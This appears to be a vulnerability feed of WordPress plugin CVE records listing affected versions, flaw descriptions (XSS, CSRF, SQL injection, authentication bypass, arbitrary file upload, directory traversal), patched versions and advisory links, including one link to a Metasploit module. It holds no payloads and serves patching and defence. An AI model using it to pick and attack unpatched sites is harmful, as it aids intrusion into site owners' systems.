{"CVE_ID":"CVE-2023-5669","slug":"featured-image-caption","versionImpact":"0.8.10","versionEndExcluding":"0.8.11","description":"The Featured Image Caption plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode and post meta in all versions up to, and including, 0.8.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.8.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c43a88c-6374-414f-97ae-26ba15d75cdc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c43a88c-6374-414f-97ae-26ba15d75cdc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-caption\\\/trunk\\\/classes\\\/MetaBox.php?rev=2300545#L91\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-caption\\\/trunk\\\/classes\\\/MetaBox.php?rev=2300545#L91\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-caption\\\/trunk\\\/classes\\\/MetaBox.php?rev=2300545#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-caption\\\/trunk\\\/classes\\\/MetaBox.php?rev=2300545#L92\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7710","slug":"bravepopup-pro","versionImpact":"0.7.7","versionEndExcluding":"0.8.0","description":"The Brave Conversion Engine (PRO) plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 0.7.7. This is due to the plugin not properly restricting a claimed identity while authenticating with Facebook. This makes it possible for unauthenticated attackers to log in as other users, including administrators.","recommendation":"Update to version 0.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/getbrave.io\\\/brave-pro-changelog\\\/\",\"name\":\"https:\\\/\\\/getbrave.io\\\/brave-pro-changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/604249c6-b23a-40e9-984d-2014f5c97249?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/604249c6-b23a-40e9-984d-2014f5c97249?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-24559","slug":"qyrr-code","versionImpact":"0.7","versionEndExcluding":"0.8","description":"The Qyrr WordPress plugin before 0.7 does not escape the data-uri of the QR Code when outputting it in a src attribute, allowing for Cross-Site Scripting attacks. Furthermore, the data_uri_to_meta AJAX action, available to all authenticated users, only had a CSRF check in place, with the nonce available to users with a role as low as Contributor allowing any user with such role (and above) to set a malicious data-uri in arbitrary QR Code posts, leading to a Stored Cross-Site Scripting issue.","recommendation":"Update to version 0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/65a29976-163a-4bbf-a4e8-590ddc4b83f2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/65a29976-163a-4bbf-a4e8-590ddc4b83f2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0372","slug":"embedstories","versionEndExcluding":"0.7.5","description":"The EmbedStories WordPress plugin before 0.7.5 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9cf90ad8-4aa4-466c-a33e-4f2706815765\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9cf90ad8-4aa4-466c-a33e-4f2706815765\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1286","slug":"pmpro-membership-maps","versionEndExcluding":"0.7","description":"The pmpro-membership-maps WordPress plugin before 0.7 does not prevent users with at least the contributor role from leaking sensitive information about users with a membership on the site.","recommendation":"Update to version 0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/49dc9ca3-d0ef-4a75-8b51-307e3e44e91b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/49dc9ca3-d0ef-4a75-8b51-307e3e44e91b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5997","slug":"duplica","versionImpact":"0.6","versionEndExcluding":"0.7","description":"The Duplica \u2013 Duplicate Posts, Pages, Custom Posts or Users plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the duplicate_user and duplicate_post functions in all versions up to, and including, 0.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create duplicates of users and posts\/pages.","recommendation":"Update to version 0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/605fac87-e1e8-4354-a9d3-4440e54bc161?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/605fac87-e1e8-4354-a9d3-4440e54bc161?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/duplica\\\/tags\\\/0.6\\\/src\\\/AJAX.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/duplica\\\/tags\\\/0.6\\\/src\\\/AJAX.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/duplica\\\/tags\\\/0.6\\\/src\\\/AJAX.php#L98\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/duplica\\\/tags\\\/0.6\\\/src\\\/AJAX.php#L98\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0270","slug":"yamaps","versionEndExcluding":"0.6.26","description":"The YaMaps for WordPress Plugin WordPress plugin before 0.6.26 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca3ca694-54ca-4e7e-82e6-33aa240754e1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca3ca694-54ca-4e7e-82e6-33aa240754e1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5987","slug":"wp-accessibility-helper","versionImpact":"0.6.2.8","versionEndExcluding":"0.6.2.9","description":"The WP Accessibility Helper (WAH) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_contrast_variations' and 'save_empty_contrast_variations' functions in all versions up to, and including, 0.6.2.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to edit or delete contrast settings.  Please note these issues were patched in 0.6.2.8, though it broke functionality and the vendor has not responded to our follow-ups.","recommendation":"Update to version 0.6.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3beee75-0480-4504-a177-45f8cd32cf36?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3beee75-0480-4504-a177-45f8cd32cf36?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3117664%40wp-accessibility-helper&new=3117664%40wp-accessibility-helper&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3117664%40wp-accessibility-helper&new=3117664%40wp-accessibility-helper&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2013-10027","slug":"blogger-importer","versionImpact":"0.5","versionEndExcluding":"0.6","description":"A vulnerability was found in Blogger Importer Plugin up to 0.5 on WordPress. It has been classified as problematic. Affected is the function start\/restart of the file blogger-importer.php. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. Upgrading to version 0.6 is able to address this issue. The name of the patch is b83fa4f862b0f19a54cfee76060ec9c2e7f7ca70. It is recommended to upgrade the affected component. VDB-230658 is the identifier assigned to this vulnerability.","recommendation":"Update to version 0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230658\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230658\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230658\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230658\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/blogger-importer\\\/commit\\\/b83fa4f862b0f19a54cfee76060ec9c2e7f7ca70\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/blogger-importer\\\/commit\\\/b83fa4f862b0f19a54cfee76060ec9c2e7f7ca70\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5051","slug":"callrail-phone-call-tracking","versionImpact":"0.5.2","versionEndExcluding":"0.5.3","description":"The CallRail Phone Call Tracking plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'callrail_form' shortcode in versions up to, and including, 0.5.2 due to insufficient input sanitization and output escaping on the 'form_id' user supplied attribute. This makes it possible for authenticated attackers with contributor level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2982876\\\/callrail-phone-call-tracking#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2982876\\\/callrail-phone-call-tracking#file0\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35def866-7460-4cad-8d86-7b9e4905cbe4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35def866-7460-4cad-8d86-7b9e4905cbe4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/callrail-phone-call-tracking\\\/tags\\\/0.5.2\\\/callrail.php#L174\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/callrail-phone-call-tracking\\\/tags\\\/0.5.2\\\/callrail.php#L174\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5475","slug":"responsive-video-embed","versionImpact":"0.5","versionEndExcluding":"0.5.1","description":"The Responsive video embed WordPress plugin before 0.5.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 0.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cee66543-b5d6-4205-8f9b-0febd7fee445\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cee66543-b5d6-4205-8f9b-0febd7fee445\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5946","slug":"squelch-tabs-and-accordions-shortcodes","versionImpact":"0.4.8","versionEndExcluding":"0.4.9","description":"The Squelch Tabs and Accordions Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018tab\u2019 shortcode in all versions up to, and including, 0.4.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33f63bd9-3031-40e8-b72e-1cbbcce5b782?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33f63bd9-3031-40e8-b72e-1cbbcce5b782?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squelch-tabs-and-accordions-shortcodes\\\/trunk\\\/squelch-tabs-and-accordions.php#L455\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squelch-tabs-and-accordions-shortcodes\\\/trunk\\\/squelch-tabs-and-accordions.php#L455\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3114198\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3114198\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-37996","slug":"gtmetrix-for-wordpress","versionImpact":"0.4.7","versionEndExcluding":"0.4.8","description":"Cross-Site Request Forgery (CSRF) vulnerability in GTmetrix GTmetrix for WordPress plugin <=\u00a00.4.7 versions.","recommendation":"Update to version 0.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gtmetrix-for-wordpress\\\/wordpress-gtmetrix-for-wordpress-plugin-0-4-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gtmetrix-for-wordpress\\\/wordpress-gtmetrix-for-wordpress-plugin-0-4-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4463","slug":"squelch-tabs-and-accordions-shortcodes","versionImpact":"0.4.7","versionEndExcluding":"0.4.8","description":"The Squelch Tabs and Accordions Shortcodes plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.4.7. This is due to missing or incorrect nonce validation when saving plugin settings. This makes it possible for unauthenticated attackers to modify plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 0.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3082482%40squelch-tabs-and-accordions-shortcodes%2Ftrunk&old=3067680%40squelch-tabs-and-accordions-shortcodes%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3082482%40squelch-tabs-and-accordions-shortcodes%2Ftrunk&old=3067680%40squelch-tabs-and-accordions-shortcodes%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd9490f2-ad52-477e-ae3b-be49984e8189?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd9490f2-ad52-477e-ae3b-be49984e8189?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-32503","slug":"gtmetrix-for-wordpress","versionEndExcluding":"0.4.7","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in GTmetrix GTmetrix for WordPress plugin <=\u00a00.4.6 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gtmetrix-for-wordpress\\\/wordpress-gtmetrix-for-wordpress-plugin-0-4-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gtmetrix-for-wordpress\\\/wordpress-gtmetrix-for-wordpress-plugin-0-4-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2012-10020","slug":"foxypress","versionEndExcluding":"0.4.2.2","description":"The FoxyPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the uploadify.php file in versions up to, and including, 0.4.2.1. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected sites server which may make remote code execution possible.","recommendation":"Update to version 0.4.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/113576\\\/\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/113576\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/555071\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/555071\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/unix\\\/webapp\\\/wp_foxypress_upload.rb\",\"name\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/unix\\\/webapp\\\/wp_foxypress_upload.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/web.archive.org\\\/web\\\/20210120060045\\\/https%3A\\\/\\\/www.securityfocus.com\\\/bid\\\/53805\\\/info\",\"name\":\"https:\\\/\\\/web.archive.org\\\/web\\\/20210120060045\\\/https%3A\\\/\\\/www.securityfocus.com\\\/bid\\\/53805\\\/info\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8fbc88da-8944-433c-b94d-9604ffe13d8a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8fbc88da-8944-433c-b94d-9604ffe13d8a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11384","slug":"arena-liveblog-and-chat-tool","versionImpact":"0.3.0","versionEndExcluding":"0.4.0","description":"The Arena.IM \u2013 Live Blogging for real-time events plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'arenablog' shortcode in all versions up to, and including, 0.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/arena-liveblog-and-chat-tool\\\/trunk\\\/shortcode\\\/init.php#L73\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/arena-liveblog-and-chat-tool\\\/trunk\\\/shortcode\\\/init.php#L73\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6bf534ba-1288-4fa5-bdfb-de62e751e5c2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6bf534ba-1288-4fa5-bdfb-de62e751e5c2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5041","slug":"track-the-click","versionImpact":"0.3.11","versionEndExcluding":"0.3.12","description":"The Track The Click WordPress plugin before 0.3.12 does not properly sanitize query parameters to the stats REST endpoint before using them in a database query, allowing a logged in user with an author role or higher to perform time based blind SQLi attacks on the database.","recommendation":"Update to version 0.3.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/45194442-6eea-4e07-85a5-4a1e2fde3523\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/45194442-6eea-4e07-85a5-4a1e2fde3523\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7135","slug":"tainacan","versionImpact":"0.21.7","versionEndExcluding":"0.21.8","description":"The Tainacan plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_file' function in all versions up to, and including, 0.21.7. The function is also vulnerable to directory traversal. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 0.21.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4dd0c6a-75af-4b53-ac13-fc4ef0e9001d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4dd0c6a-75af-4b53-ac13-fc4ef0e9001d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tainacan\\\/trunk\\\/classes\\\/api\\\/endpoints\\\/class-tainacan-rest-background-processes-controller.php#L370\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tainacan\\\/trunk\\\/classes\\\/api\\\/endpoints\\\/class-tainacan-rest-background-processes-controller.php#L370\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tainacan\\\/trunk\\\/classes\\\/api\\\/endpoints\\\/class-tainacan-rest-background-processes-controller.php#L378\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tainacan\\\/trunk\\\/classes\\\/api\\\/endpoints\\\/class-tainacan-rest-background-processes-controller.php#L378\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3127693\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3127693\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13236","slug":"tainacan","versionImpact":"0.21.12","versionEndExcluding":"0.21.13","description":"The Tainacan plugin for WordPress is vulnerable to SQL Injection via the 'collection_id' parameter in all versions up to, and including, 0.21.12 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 0.21.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tainacan\\\/tags\\\/0.21.12\\\/classes\\\/api\\\/endpoints\\\/class-tainacan-rest-reports-controller.php#L707\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tainacan\\\/tags\\\/0.21.12\\\/classes\\\/api\\\/endpoints\\\/class-tainacan-rest-reports-controller.php#L707\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tainacan\\\/tags\\\/0.21.12\\\/classes\\\/api\\\/endpoints\\\/class-tainacan-rest-reports-controller.php#L732\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tainacan\\\/tags\\\/0.21.12\\\/classes\\\/api\\\/endpoints\\\/class-tainacan-rest-reports-controller.php#L732\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226475\\\/tainacan\\\/trunk\\\/classes\\\/api\\\/endpoints\\\/class-tainacan-rest-reports-controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226475\\\/tainacan\\\/trunk\\\/classes\\\/api\\\/endpoints\\\/class-tainacan-rest-reports-controller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9638fb98-045b-44ec-8b53-15cfa3693ee7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9638fb98-045b-44ec-8b53-15cfa3693ee7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9221","slug":"tainacan","versionImpact":"0.21.10","versionEndExcluding":"0.21.11","description":"The Tainacan plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 0.21.10. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 0.21.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85a8a7df-b472-4a81-b808-a413c158c1cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85a8a7df-b472-4a81-b808-a413c158c1cf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tainacan\\\/tags\\\/0.21.10\\\/classes\\\/theme-helper\\\/template-tags.php#L1524\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tainacan\\\/tags\\\/0.21.10\\\/classes\\\/theme-helper\\\/template-tags.php#L1524\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165873\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165873\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tainacan\\\/tags\\\/0.21.10\\\/classes\\\/theme-helper\\\/template-tags.php#L1298\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tainacan\\\/tags\\\/0.21.10\\\/classes\\\/theme-helper\\\/template-tags.php#L1298\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12459","slug":"ganohrs-toggle-shortcode","versionImpact":"0.2.4","versionEndExcluding":"0.2.5","description":"The Ganohrs Toggle Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'toggle' shortcode in all versions up to, and including, 0.2.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ganohrs-toggle-shortcode\\\/tags\\\/0.2.4\\\/ganohrs-toggle-shortcode.php#L350\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ganohrs-toggle-shortcode\\\/tags\\\/0.2.4\\\/ganohrs-toggle-shortcode.php#L350\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ganohrs-toggle-shortcode\\\/tags\\\/0.2.4\\\/ganohrs-toggle-shortcode.php#L98\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ganohrs-toggle-shortcode\\\/tags\\\/0.2.4\\\/ganohrs-toggle-shortcode.php#L98\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207393%40ganohrs-toggle-shortcode&new=3207393%40ganohrs-toggle-shortcode&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207393%40ganohrs-toggle-shortcode&new=3207393%40ganohrs-toggle-shortcode&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efd49905-0f2c-44b7-85c6-c2b77440ac17?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efd49905-0f2c-44b7-85c6-c2b77440ac17?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13590","slug":"ketchup-shortcodes-pack","versionImpact":"0.1.2","versionEndExcluding":"0.2.1","description":"The Ketchup Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'spacer' shortcode in all versions up to, and including, 0.1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.2.1, or a newer patched 